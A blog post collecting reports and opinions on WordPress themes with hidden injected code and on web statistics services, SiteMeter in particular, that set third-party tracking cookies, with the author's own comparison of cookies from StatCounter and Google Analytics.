spyware

Via GigaOM:

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....

...There are lots of reasons a hacker may want to inject code into a page:

• To infect visitors by exploiting a browser vulnerability
• To place ads they can then get revenue from
• To embed links to blogs they own, improving their page rank
• To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.

It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also hacks and vulnerable code gimmicks pursued amateur theme developers who just don't know better. It's not just a Wordpress thing -- it's all websites, whether built on open source or proprietary platforms (though not static html sites, which presumably are as safe as their servers).

In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the proper API calls to protect your site from things like XSS, you can just clean that up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill-will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.

Recently my longest-used website statistics service, StatCounter, posted a boast about how they turned away big advertisers who wanted to embed spyware cookies into the StatCounter tracking code. They also hinted that another big web stats company did not say no, and is planting spyware into their clients' websites on behalf of undisclosed advertisers.

You install StatCounter to track visitors to your site NOT to open yourself and your visitors up to being spied upon by phantom advertising corporations.

It appears, however, that other players in the world of webstats were happy to take up this offer…

We were shocked to discover just today that another well known stats provider is allowing up to 9 cookies to be installed in the browser of every visitor that hits one of their member websites. This means that the provider is making money by transmitting data on you and your visitors to a third party advertiser. Not only that, but to add insult to injury, the cookies are causing the member websites to load very slowly too.

Yikes.

Commenters weren't so coy. And neither were other bloggers.

Although SiteMeter has some really useful tools and information, I value your privacy and I will not tolerate this sort of behavior, therefore I’ve removed it completely from the site. I will now be switching to Google Analytics for stats and don’t expect any more problems of this nature. After all Google is known to be one of the most non-evil businesses there is and that is just perfect for The Best in Life.

troubled diva:

After five and a half happy years of stats-watching, I have just ditched SiteMeter from this site.

The reason? The SiteMeter Javascript has started serving calls to specificclick.net, which attempts to place site-tracking cookies (a.k.a. spyware) on your machine. Not only is this Bad and Wrong - it's also Dead Slow and A Bit Crap Really. Especially if you're still using Internet Explorer, which has been noticeably slow in loading this site for quite a while now.

Suburban Hen:

So, if you aren't sure if your provider has your best interests at heart and that bothers you, switch. I realise this isn't appealing to those who are a bit attached to that number at the bottom (side, top, centre...WHATEVER) of their web page, but quite frankly, surreptitious loading of cookies onto peoples computers to drag more money out of our arses is not that appealing either.

Just sayin'.

As it turns out, the specificclick cookie set by SiteMeter "tracks browsing activity." Seems innocuous enough, until you consider that it's tracking all browsing activity, not just clicks on that site where the cookie is set. Meaning they know where you bank, what discussion forums you visit, what, ahem, other websites you might be viewing on the sly.

In a comment on The Best Things in Life: Free, west writes of an email he received from SiteMeter, which proclaimed:

Over the next few months we will be rolling out enhancements to our service that will offer you more information about your users like their other content interests and demographics (a la Quantcast).

I don't know about you, but to me that sounds like, well, spying.

I ran a test: Cleared all my cookies on Opera, which I hardly ever use, and visited my business website. Sure enough, StatCounter is clean: one single cookie, which they use to track visitor behavior on your own site.

Google Analytics, however, is especially sneaky: It sets four cookies and pretends they are set by the site itself. One of these cookies doesn't expire until 2036! Another expires in ... 1969.

I have no idea what Google is doing with these cookies. It seems rather sneaky to mask them as belonging to the site owner, though I suppose that arguably can make their stats more meaningful, as presumably quite a few people set their browsers to block the setting of all cookies except for those originating from the visited site itself.

As for SiteMeter, I can't say I cared for their service in the first place. I had tried them years ago, but never stuck. Needless to say, I won't be going back any time soon. Where things stand with SiteMeter's spyware policy now, I'm not sure. Shane offers this update:

Two and a half weeks after StatCounter broke the story and it began to spread across the web, SiteMeter has begun to respond to the issue both in the comments of my post and at much greater length in the comments on Eric Odem’s.

Despite that, though, I can still not find not find the official response they say is on their own blog, nor have they directly addressed many of the specific issues that people have reported. I hate that because I have a feeling they really haven’t done anything wrong, but their damage control isn’t helping them at all.

Michael Sync has a helpful public service kind of post for those not all that familiar with cookies or how to deal with them.

Meanwhile, I'm glad I've been using StatCounter.